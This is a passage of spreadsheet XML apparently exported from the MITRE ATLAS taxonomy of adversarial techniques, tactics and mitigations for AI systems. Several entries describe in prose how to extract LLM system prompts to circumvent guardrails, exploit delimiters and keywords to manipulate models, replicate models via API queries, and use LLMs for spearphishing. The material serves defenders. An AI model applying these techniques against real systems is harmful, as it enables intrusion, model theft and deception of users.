Research and technical materials may exist as academic papers published in [Journals and Conference Proceedings](/techniques/AML.T0000.000), or stored in [Pre-Print Repositories](/techniques/AML.T0000.001), as well as [Technical Blogs](/techniques/AML.T0000.002).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0000</t>
  </si>
  <si>
    <t>AML.T0003</t>
  </si>
  <si>
    <t>attack-pattern--2fd7ca0a-8ca1-44fa-852f-f68db00b756d</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>Adversaries may search websites owned by the victim for information that can be used during targeting.
Victim-owned websites may contain technical details about their AI-enabled products or services.
Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info.
These sites may also have details highlighting business operations and relationships.
Adversaries may search victim-owned websites to gather actionable information.
This information may help adversaries tailor their attacks (e.g. [Adversarial AI Attacks](/techniques/AML.T0017.000) or [Manual Modification](/techniques/AML.T0043.003)).
Information from these sources may reveal opportunities for other forms of reconnaissance (e.g. [Search Open Technical Databases](/techniques/AML.T0000) or [Search Open AI Vulnerability Analysis](/techniques/AML.T0001))</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0003</t>
  </si>
  <si>
    <t>AML.T0008.004</t>
  </si>
  <si>
    <t>attack-pattern--9ff99618-2174-4826-87c5-05603723a0b2</t>
  </si>
  <si>
    <t>Serverless</t>
  </si>
  <si>
    <t>Adversaries may purchase and configure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 traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers. This can be used to bypass a Content Security Policy that prevents retrieving content from arbitrary locations.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.004</t>
  </si>
  <si>
    <t>AML.T0048.002</t>
  </si>
  <si>
    <t>attack-pattern--5c410f62-7a6b-4759-947d-18e110e0706c</t>
  </si>
  <si>
    <t>Societal Harm</t>
  </si>
  <si>
    <t xml:space="preserve">Societal harms might generate harmful outcomes that reach either the general public or specific vulnerable groups such as the exposure of children to vulgar content.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.002</t>
  </si>
  <si>
    <t>AML.T0016.001</t>
  </si>
  <si>
    <t>attack-pattern--b1f3f9e9-0b83-430e-81e1-05f90612009e</t>
  </si>
  <si>
    <t>Software Tools</t>
  </si>
  <si>
    <t>Adversaries may search for and obtain software tools to support their operations.
Software designed for legitimate use may be repurposed by an adversary for malicious intent.
An adversary may modify or customize software tools to achieve their purpose.
Software tools used to support attacks on AI systems are not necessarily AI-based themselves.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0016.001</t>
  </si>
  <si>
    <t>AML.T0046</t>
  </si>
  <si>
    <t>attack-pattern--92eb716e-f0e3-47de-8693-107bbd9d6554</t>
  </si>
  <si>
    <t>Spamming AI System with Chaff Data</t>
  </si>
  <si>
    <t>Adversaries may spam the AI system with chaff data that causes increase in the number of detections.
This can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0046</t>
  </si>
  <si>
    <t>AML.T0052.000</t>
  </si>
  <si>
    <t>attack-pattern--34a1e3e5-aef6-466e-b7fd-83f958a5aa75</t>
  </si>
  <si>
    <t>Spearphishing via Social Engineering LLM</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may turn LLMs into targeted social engineers.
LLMs are capable of interacting with users via text conversations.
They can be instructed by an adversary to seek sensitive information from a user and act as effective social engineers.
They can be targeted towards particular personas defined by the adversary.
This allows adversaries to scale spearphishing efforts and target individuals to reveal private information such as credentials to privileged systems.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0052.000</t>
  </si>
  <si>
    <t>AML.T0069.000</t>
  </si>
  <si>
    <t>attack-pattern--2d916848-8a92-4aa7-9b08-e8d61fe7af1f</t>
  </si>
  <si>
    <t>Special Character Sets</t>
  </si>
  <si>
    <t>Adversaries may discover delimiters and special characters sets used by the large language model. For example, delimiters used in retrieval augmented generation applications to differentiate between context and user prompts. These can later be exploited to confuse or manipulate the large language model into misbehaving.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0069.000</t>
  </si>
  <si>
    <t>AML.T0079</t>
  </si>
  <si>
    <t>attack-pattern--d8d9c2c8-8537-4515-887a-69aa029bc1c6</t>
  </si>
  <si>
    <t>Stage Capabilities</t>
  </si>
  <si>
    <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](/techniques/AML.T0017)) or obtained ([Obtain Capabilities](/techniques/AML.T0016)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](/techniques/AML.T0008)) or was otherwise compromised by them. Capabilities may also be staged on web services, such as GitHub, model registries, such as Hugging Face, or container registries.
Adversaries may stage a variety of AI Artifacts including poisoned datasets ([Publish Poisoned Datasets](/techniques/AML.T0019), malicious models ([Publish Poisoned Models](/techniques/AML.T0058)), and prompt injections. They may target names of legitimate companies or products, engage in typosquatting, or use hallucinated entities ([Discover LLM Hallucinations](/techniques/AML.T0062)).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0079</t>
  </si>
  <si>
    <t>AML.T0069.001</t>
  </si>
  <si>
    <t>attack-pattern--928e83ff-b63f-473f-a0d3-a20fd9b8e9c7</t>
  </si>
  <si>
    <t>System Instruction Keywords</t>
  </si>
  <si>
    <t>Adversaries may discover keywords that have special meaning to the large language model (LLM), such as function names or object names. These can later be exploited to confuse or manipulate the LLM into misbehaving and to make calls to plugins the LLM has access to.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0069.001</t>
  </si>
  <si>
    <t>AML.T0069.002</t>
  </si>
  <si>
    <t>attack-pattern--34975325-8143-4099-8af1-f83de967d177</t>
  </si>
  <si>
    <t>System Prompt</t>
  </si>
  <si>
    <t>Adversaries may discover a large language model's system instructions provided by the AI system builder to learn about the system's capabilities and circumvent its guardrails.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0069.002</t>
  </si>
  <si>
    <t>AML.T0000.002</t>
  </si>
  <si>
    <t>attack-pattern--459dc255-c7a4-4aef-ba10-0b402f66c694</t>
  </si>
  <si>
    <t>Technical Blogs</t>
  </si>
  <si>
    <t>Research labs at academic institutions and Company R&amp;D divisions often have blogs that highlight their use of artificial intelligence and its application to the organizations unique problems.
Individual researchers also frequently document their work in blogposts.
An adversary may search for posts made by the target victim organization or its employees.
In comparison to [Journals and Conference Proceedings](/techniques/AML.T0000.000) and [Pre-Print Repositories](/techniques/AML.T0000.001) this material will often contain more practical aspects of the AI system.
This could include underlying technologies and frameworks used, and possibly some information about the API access and use case.
This will help the adversary better understand how that organization is using AI internally and the details of their approach that could aid in tailoring an attack.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0000.002</t>
  </si>
  <si>
    <t>AML.T0005.000</t>
  </si>
  <si>
    <t>attack-pattern--279383cb-aaac-480d-aa91-39d44da7cd55</t>
  </si>
  <si>
    <t>Train Proxy via Gathered AI Artifacts</t>
  </si>
  <si>
    <t>Proxy models may be trained from AI artifacts (such as data, model architectures, and pre-trained models) that are representative of the target model gathered by the adversary.
This can be used to develop attacks that require higher levels of access than the adversary has available or as a means to validate pre-existing attacks without interacting with the target model.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0005.000</t>
  </si>
  <si>
    <t>AML.T0005.001</t>
  </si>
  <si>
    <t>attack-pattern--ec881f8c-1b0f-466d-abef-5e56521fcd93</t>
  </si>
  <si>
    <t>Train Proxy via Replication</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may replicate a private model.
By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.
A replicated model that closely mimic's the target model is a valuable resource in staging the attack.
The adversary can use the replicated model to [Craft Adversarial Data](/techniques/AML.T0043) for various purposes (e.g. [Evade AI Model](/techniques/AML.T0015), [Spamming AI System with Chaff Data](/techniques/AML.T0046)).
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0005.001</t>
  </si>
  <si>
    <t>AML.T0011.000</t>
  </si>
  <si>
    <t>attack-pattern--a9bc20bd-9f88-4794-8ff3-cfd86a2bc2ae</t>
  </si>
  <si>
    <t>Unsafe AI Artifacts</t>
  </si>
  <si>
    <t>Adversaries may develop unsafe AI artifacts that when executed have a deleterious effect.
The adversary can use this technique to establish persistent access to systems.
These models may be introduced via a [AI Supply Chain Compromise](/techniques/AML.T0010).
Serialization of models is a popular technique for model storage, transfer, and loading.
However, this format without proper checking presents an opportunity for code execution.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0011.000</t>
  </si>
  <si>
    <t>AML.T0055</t>
  </si>
  <si>
    <t>attack-pattern--581a34ca-98ae-4a6a-94eb-38b6a6f16b22</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may search compromised systems to find and obtain insecurely stored credentials.
These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. bash history), environment variables, operating system, or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. private keys).
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0055</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>AML.T0005.002</t>
  </si>
  <si>
    <t>attack-pattern--45238ba0-2955-4ab7-b26f-c8892d32d86b</t>
  </si>
  <si>
    <t>Use Pre-Trained Model</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use an off-the-shelf pre-trained model as a proxy for the victim model to aid in staging the attack.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0005.002</t>
  </si>
  <si>
    <t>AML.T0011</t>
  </si>
  <si>
    <t>attack-pattern--67487920-42fd-43d6-86d9-52e683e64c19</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may rely upon specific actions by a user in order to gain execution.
Users may inadvertently execute unsafe code introduced via [AI Supply Chain Compromise](/techniques/AML.T0010).
Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0011</t>
  </si>
  <si>
    <t>AML.T0048.003</t>
  </si>
  <si>
    <t>attack-pattern--6259d6af-6e70-4597-a577-8e71f2a15af7</t>
  </si>
  <si>
    <t>User Harm</t>
  </si>
  <si>
    <t xml:space="preserve">User harms may encompass a variety of harm types including financial and reputational that are directed at or felt by individual victims of the attack rather than at the organization level.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.003</t>
  </si>
  <si>
    <t>AML.T0012</t>
  </si>
  <si>
    <t>attack-pattern--c476cf85-34c6-4c06-a4b5-062bd6001b38</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.
Credentials may take the form of usernames and passwords of individual user accounts or API keys that provide access to various AI resources and services.
Compromised credentials may provide access to additional AI artifacts and allow the adversary to perform [Discover AI Artifacts](/techniques/AML.T0007).
Compromised credentials may also grant an adversary increased privileges such as write access to AI artifacts used during development or production.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0012</t>
  </si>
  <si>
    <t>AML.T0042</t>
  </si>
  <si>
    <t>attack-pattern--fe2f48bd-5f4c-49a2-9e65-cbf2d2267b46</t>
  </si>
  <si>
    <t>Verify Attack</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries can verify the efficacy of their attack via an inference API or access to an offline copy of the target model.
This gives the adversary confidence that their approach works and allows them to carry out the attack at a later time of their choosing.
The adversary may verify the attack once but use it against many edge devices running copies of the target model.
The adversary may verify their attack digitally, then deploy it in the [Physical Environment Access](/techniques/AML.T0041) at a later time.
Verifying the attack may be hard to detect since the adversary can use a minimal number of queries or an offline copy of the model.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0042</t>
  </si>
  <si>
    <t>AML.T0043.000</t>
  </si>
  <si>
    <t>attack-pattern--e7df1199-39d9-4d35-bee7-5f7f8ef8f9cd</t>
  </si>
  <si>
    <t>White-Box Optimization</t>
  </si>
  <si>
    <t xml:space="preserve">In White-Box Optimization, the adversary has full access to the target model and optimizes the adversarial example directly.
Adversarial examples trained in this manner are most effective against the target model.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
  </si>
  <si>
    <t>AML.TA0001</t>
  </si>
  <si>
    <t>x-mitre-tactic--388330a4-f142-4895-935c-0fc615225df0</t>
  </si>
  <si>
    <t>The adversary is leveraging their knowledge of and access to the target system to tailor the attack.
AI Attack Staging consists of techniques adversaries use to prepare their attack on the target AI model.
Techniques can include training proxy models, poisoning the target model, and crafting adversarial data to feed the target model.
Some of these techniques can be performed in an offline manner and are thus difficult to mitigate.
These techniques are often used to achieve the adversary's end goal.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0001</t>
  </si>
  <si>
    <t>AML.TA0000</t>
  </si>
  <si>
    <t>x-mitre-tactic--07adc703-b1fb-473f-a9e6-ef4fd6a58442</t>
  </si>
  <si>
    <t>The adversary is attempting to gain some level of access to an AI model.
AI Model Access enables techniques that use various types of access to the AI model that can be used by the adversary to gain information, develop attacks, and as a means to input data to the model.
The level of access can range from the full knowledge of the internals of the model to access to the physical environment where data is collected for use in the AI model.
The adversary may use varying levels of model access during the course of their attack, from staging the attack to impacting the target system.
Access to an AI model may require access to the system housing the model, the model may be publically accessible via an API, or it may be accessed indirectly via interaction with a product or service that utilizes AI as part of its processes.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0000</t>
  </si>
  <si>
    <t>AML.TA0009</t>
  </si>
  <si>
    <t>x-mitre-tactic--af4c8070-9618-4da2-bfec-2cc253f41ae3</t>
  </si>
  <si>
    <t>The adversary is trying to gather AI artifacts and other related information relevant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AI artifacts, or use the collected information to stage future operations.
Common target sources include software repositories, container registries, model repositories, and object stores.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0009</t>
  </si>
  <si>
    <t>AML.TA0014</t>
  </si>
  <si>
    <t>x-mitre-tactic--b370966c-00c6-4b7c-948b-9e1b805bc6da</t>
  </si>
  <si>
    <t>The adversary is trying to communicate with compromised AI systems to control them.
Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim's network structure and defenses.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0014</t>
  </si>
  <si>
    <t>AML.TA0013</t>
  </si>
  <si>
    <t>x-mitre-tactic--398fa5a9-194c-483e-82d6-9a6b57e3eefc</t>
  </si>
  <si>
    <t xml:space="preserve">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
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0013</t>
  </si>
  <si>
    <t>AML.TA0007</t>
  </si>
  <si>
    <t>x-mitre-tactic--c9cf0175-296e-4439-852d-afb870ed5e0c</t>
  </si>
  <si>
    <t>The adversary is trying to avoid being detected by AI-enabled security software.
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise.
Techniques used for defense evasion include evading AI-enabled security software such as malware detectors.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0007</t>
  </si>
  <si>
    <t>AML.TA0008</t>
  </si>
  <si>
    <t>x-mitre-tactic--d57d4782-2e85-447d-91a8-0cb8123a4f21</t>
  </si>
  <si>
    <t>The adversary is trying to figure out your AI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t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0008</t>
  </si>
  <si>
    <t>AML.TA0005</t>
  </si>
  <si>
    <t>x-mitre-tactic--1f442889-a32d-4355-b079-54dfaa6564ca</t>
  </si>
  <si>
    <t>The adversary is trying to run malicious code embedded in AI artifacts or software.
Execution consists of techniques that result in adversary-controlled code running on a local or remote system.
Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data.
For example, an adversary might use a remote access tool to run a PowerShell script that does [Remote System Discovery](https://attack.mitre.org/techniques/T1018/).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0005</t>
  </si>
  <si>
    <t>AML.TA0010</t>
  </si>
  <si>
    <t>x-mitre-tactic--cbc44930-843c-41be-b07a-93234ce861c0</t>
  </si>
  <si>
    <t>The adversary is trying to steal AI artifacts or other information about the AI system.
Exfiltration consists of techniques that adversaries may use to steal data from your network.
Data may be stolen for its valuable intellectual property, or for use in staging future operations.
Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0010</t>
  </si>
  <si>
    <t>AML.TA0011</t>
  </si>
  <si>
    <t>x-mitre-tactic--6086655a-a9dc-4962-87ef-ca7eef261820</t>
  </si>
  <si>
    <t>The adversary is trying to manipulate, interrupt, erode confidence in, or destroy your AI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</si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0011</t>
  </si>
  <si>
    <t>AML.TA0004</t>
  </si>
  <si>
    <t>x-mitre-tactic--30a41790-7c46-4913-a7ff-38fadd67c15e</t>
  </si>
  <si>
    <t>The adversary is trying to gain access to the AI system.
The target system could be a network, mobile device, or an edge device such as a sensor platform.
The AI capabilities used by the system could be local with onboard or cloud-enabled AI capabilities.
Initial Access consists of techniques that use various entry vectors to gain their initial foothold within the system.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0004</t>
  </si>
  <si>
    <t>AML.TA0006</t>
  </si>
  <si>
    <t>x-mitre-tactic--fe06fd86-737a-412a-abfd-4b6f38c264d5</t>
  </si>
  <si>
    <t>The adversary is trying to maintain their foothold via AI artifacts or software.
Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.
Techniques used for persistence often involve leaving behind modified ML artifacts such as poisoned training data or manipulated AI models.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0006</t>
  </si>
  <si>
    <t>AML.TA0012</t>
  </si>
  <si>
    <t>x-mitre-tactic--d900d1a1-0715-4f22-92a0-cf292a2761e4</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t xml:space="preserve">The adversary is trying to gain higher-level permissions.
Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:
- SYSTEM/root level
- local administrator
- user account with admin-like access
- user accounts with access to specific system or perform specific function
These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0012</t>
  </si>
  <si>
    <t>AML.TA0002</t>
  </si>
  <si>
    <t>x-mitre-tactic--8ed07aa0-b2fb-4267-ad98-84da4669dcec</t>
  </si>
  <si>
    <t>The adversary is trying to gather information about the AI system they can use to plan future operations.
Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting.
Such information may include details of the victim organizations' AI capabilities and research efforts.
This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to obtain relevant AI artifacts, targeting AI capabilities used by the victim, tailoring attacks to the particular models used by the victim, or to drive and lead further Reconnaissance efforts.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0002</t>
  </si>
  <si>
    <t>AML.TA0003</t>
  </si>
  <si>
    <t>x-mitre-tactic--fbc5143a-9d65-44dd-8ff6-1fde80208cf3</t>
  </si>
  <si>
    <t>The adversary is trying to establish resources they can use to support operations.
Resource Development consists of techniques that involve adversaries creating,
purchasing, or compromising/stealing resources that can be used to support targeting.
Such resources include AI artifacts, infrastructure, accounts, or capabilities.
These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as [AI Attack Staging](/tactics/AML.TA0001).</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/tactics/AML.TA0003</t>
  </si>
  <si>
    <t>relationship citations</t>
  </si>
  <si>
    <t>AML.M0023</t>
  </si>
  <si>
    <t>course-of-action--d28fd806-c567-4cce-bcef-4981908f8dbc</t>
  </si>
  <si>
    <t>AI Bill of Materials</t>
  </si>
  <si>
    <t>An AI Bill of Materials (AI BOM) contains a full listing of artifacts and resources that were used in building the AI. The AI BOM can help mitigate supply chain risks and enable rapid response to reported vulnerabilities.
This can include maintaining dataset provenance, i.e. a detailed history of datasets used for AI applications. The history can include information about the dataset source as well as well as a complete record of any modifications.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0023</t>
  </si>
  <si>
    <t>AML.M0017</t>
  </si>
  <si>
    <t>course-of-action--0ecbe6e0-865e-439c-925b-da558632bda6</t>
  </si>
  <si>
    <t>AI Model Distribution Methods</t>
  </si>
  <si>
    <t>Deploying AI models to edge devices can increase the attack surface of the system.
Consider serving models in the cloud to reduce the level of access the adversary has to the model.
Also consider computing features in the cloud to prevent gray-box attacks, where an adversary has access to the model preprocessing methods.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0017</t>
  </si>
  <si>
    <t>AML.M0024</t>
  </si>
  <si>
    <t>course-of-action--c887ee08-5448-41bb-a94a-e53bfedfa8b7</t>
  </si>
  <si>
    <t>AI Telemetry Logging</t>
  </si>
  <si>
    <t>Implement logging of inputs and outputs of deployed AI models. Monitoring logs can help to detect security threats and mitigate impacts.
Additionally, having logging enabled can discourage adversaries who want to remain undetected from utilizing AI resources.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0024</t>
  </si>
  <si>
    <t>AML.M0015</t>
  </si>
  <si>
    <t>course-of-action--99b7b032-7353-436b-a200-f52fca92cb11</t>
  </si>
  <si>
    <t>Adversarial Input Detection</t>
  </si>
  <si>
    <t>Detect and block adversarial inputs or atypical queries that deviate from known benign behavior, exhibit behavior patterns observed in previous attacks or that come from potentially malicious IPs.
Incorporate adversarial detection algorithms into the AI system prior to the AI model.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0015</t>
  </si>
  <si>
    <t>AML.M0013</t>
  </si>
  <si>
    <t>course-of-action--73e8d31a-5f48-4415-8f74-4f443a853050</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing. Adversaries can embed malicious code in AI software or models. Enforcement of code signing can prevent the compromise of the AI supply chain and prevent execution of malicious code.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0013</t>
  </si>
  <si>
    <t>AML.M0005</t>
  </si>
  <si>
    <t>course-of-action--35a8cc31-c63d-4fb9-90c0-1dbba7bc724a</t>
  </si>
  <si>
    <t>Control Access to AI Models and Data at Rest</t>
  </si>
  <si>
    <t xml:space="preserve">Establish access controls on internal model registries and limit internal access to production models. Limit access to training data only to approved users.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0005</t>
  </si>
  <si>
    <t>AML.M0019</t>
  </si>
  <si>
    <t>course-of-action--8ec8b9e0-1934-4298-a1b3-f7c90bd9d864</t>
  </si>
  <si>
    <t>Control Access to AI Models and Data in Production</t>
  </si>
  <si>
    <t xml:space="preserve">Require users to verify their identities before accessing a production model.
Require authentication for API endpoints and monitor production model queries to ensure compliance with usage policies and to prevent model misuse.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0019</t>
  </si>
  <si>
    <t>AML.M0012</t>
  </si>
  <si>
    <t>course-of-action--633d5427-a2a6-4453-8675-7378e1b870e2</t>
  </si>
  <si>
    <t>Encrypt Sensitive Information</t>
  </si>
  <si>
    <t>Encrypt sensitive data such as AI models to protect against adversaries attempting to access sensitive data.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0012</t>
  </si>
  <si>
    <t>AML.M0020</t>
  </si>
  <si>
    <t>course-of-action--ed266799-ad60-4515-a112-fb668d12cc07</t>
  </si>
  <si>
    <t>Generative AI Guardrails</t>
  </si>
  <si>
    <t>Guardrails are safety controls that are placed between a generative AI model and the output shared with the user to prevent undesired inputs and outputs.
Guardrails can take the form of validators such as filters, rule-based logic, or regular expressions, as well as AI-based approaches, such as classifiers and utilizing LLMs, or named entity recognition (NER) to evaluate the safety of the prompt or response. Domain specific methods can be employed to reduce risks in a variety of areas such as etiquette, brand damage, jailbreaking, false information, code exploits, SQL injections, and data leakage.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0020</t>
  </si>
  <si>
    <t>AML.M0021</t>
  </si>
  <si>
    <t>course-of-action--e0135277-437f-4b2f-a2bd-66eee71c15e5</t>
  </si>
  <si>
    <t>Generative AI Guidelines</t>
  </si>
  <si>
    <t>Guidelines are safety controls that are placed between user-provided input and a generative AI model to help direct the model to produce desired outputs and prevent undesired outputs.
Guidelines can be implemented as instructions appended to all user prompts or as part of the instructions in the system prompt. They can define the goal(s), role, and voice of the system, as well as outline safety and security parameters.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0021</t>
  </si>
  <si>
    <t>AML.M0022</t>
  </si>
  <si>
    <t>course-of-action--b45ca9a8-2fe5-467b-b431-b9214c4f3e9b</t>
  </si>
  <si>
    <t>Generative AI Model Alignment</t>
  </si>
  <si>
    <t>When training or fine-tuning a generative AI model it is important to utilize techniques that improve model alignment with safety, security, and content policies.
The fine-tuning process can potentially remove built-in safety mechanisms in a generative AI model, but utilizing techniques such as Supervised Fine-Tuning, Reinforcement Learning from Human Feedback or AI Feedback, and Targeted Safety Context Distillation can improve the safety and alignment of the model.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0022</t>
  </si>
  <si>
    <t>AML.M0010</t>
  </si>
  <si>
    <t>course-of-action--2310ea30-59c9-425c-8ca7-826d267555df</t>
  </si>
  <si>
    <t>Input Restoration</t>
  </si>
  <si>
    <t xml:space="preserve">Preprocess all inference data to nullify or reverse potential adversarial perturbations.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0010</t>
  </si>
  <si>
    <t>AML.M0001</t>
  </si>
  <si>
    <t>course-of-action--d9f92e31-bd25-4e24-8e09-a6dadcfd8020</t>
  </si>
  <si>
    <t>Limit Model Artifact Release</t>
  </si>
  <si>
    <t xml:space="preserve">Limit public release of technical project details including data, algorithms, model architectures, and model checkpoints that are used in production, or that are representative of those used in production.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0001</t>
  </si>
  <si>
    <t>AML.M0000</t>
  </si>
  <si>
    <t>course-of-action--c2885145-a7d5-4100-983d-4d6de9f26425</t>
  </si>
  <si>
    <t>Limit Public Release of Information</t>
  </si>
  <si>
    <t>Limit the public release of technical information about the AI stack used in an organization's products or services. Technical knowledge of how AI is used can be leveraged by adversaries to perform targeting and tailor attacks to the target system. Additionally, consider limiting the release of organizational information - including physical locations, researcher names, and department structures - from which technical details such as AI techniques, model architectures, or datasets may be inferred.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0000</t>
  </si>
  <si>
    <t>AML.M0025</t>
  </si>
  <si>
    <t>course-of-action--56c77b01-667d-4f45-83f6-8c25e23b7e4c</t>
  </si>
  <si>
    <t>Maintain AI Dataset Provenance</t>
  </si>
  <si>
    <t>Maintain a detailed history of datasets used for AI applications. The history should include information about the dataset's source as well as a complete record of any modifications.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0025</t>
  </si>
  <si>
    <t>AML.M0003</t>
  </si>
  <si>
    <t>course-of-action--d7a6bd67-982c-4fc0-91ec-8bf86b156055</t>
  </si>
  <si>
    <t>Model Hardening</t>
  </si>
  <si>
    <t>Use techniques to make AI models robust to adversarial inputs such as adversarial training or network distillation.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0003</t>
  </si>
  <si>
    <t>AML.M0002</t>
  </si>
  <si>
    <t>course-of-action--4981d26b-37c3-42be-83ff-298b1fb7710f</t>
  </si>
  <si>
    <t>Passive AI Output Obfuscation</t>
  </si>
  <si>
    <t xml:space="preserve">Decreasing the fidelity of model outputs provided to the end user can reduce an adversaries ability to extract information about the model and optimize attacks for the model.
</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0002</t>
  </si>
  <si>
    <t>AML.M0011</t>
  </si>
  <si>
    <t>course-of-action--564257e2-a859-4a6b-b01a-0a997fe06590</t>
  </si>
  <si>
    <t>Restrict Library Loading</t>
  </si>
  <si>
    <t>Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
File formats such as pickle files that are commonly used to store AI models can contain exploits that allow for loading of malicious libraries.</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0011</t>
  </si>
  <si>
    <t>AML.M0004</t>
  </si>
  <si>
    <t>course-of-action--6b033c58-3eb4-4afb-97d1-f4ea00ae2849</t>
  </si>
  <si>
    <t>Restrict Number of AI Model Queries</t>
  </si>
  <si>
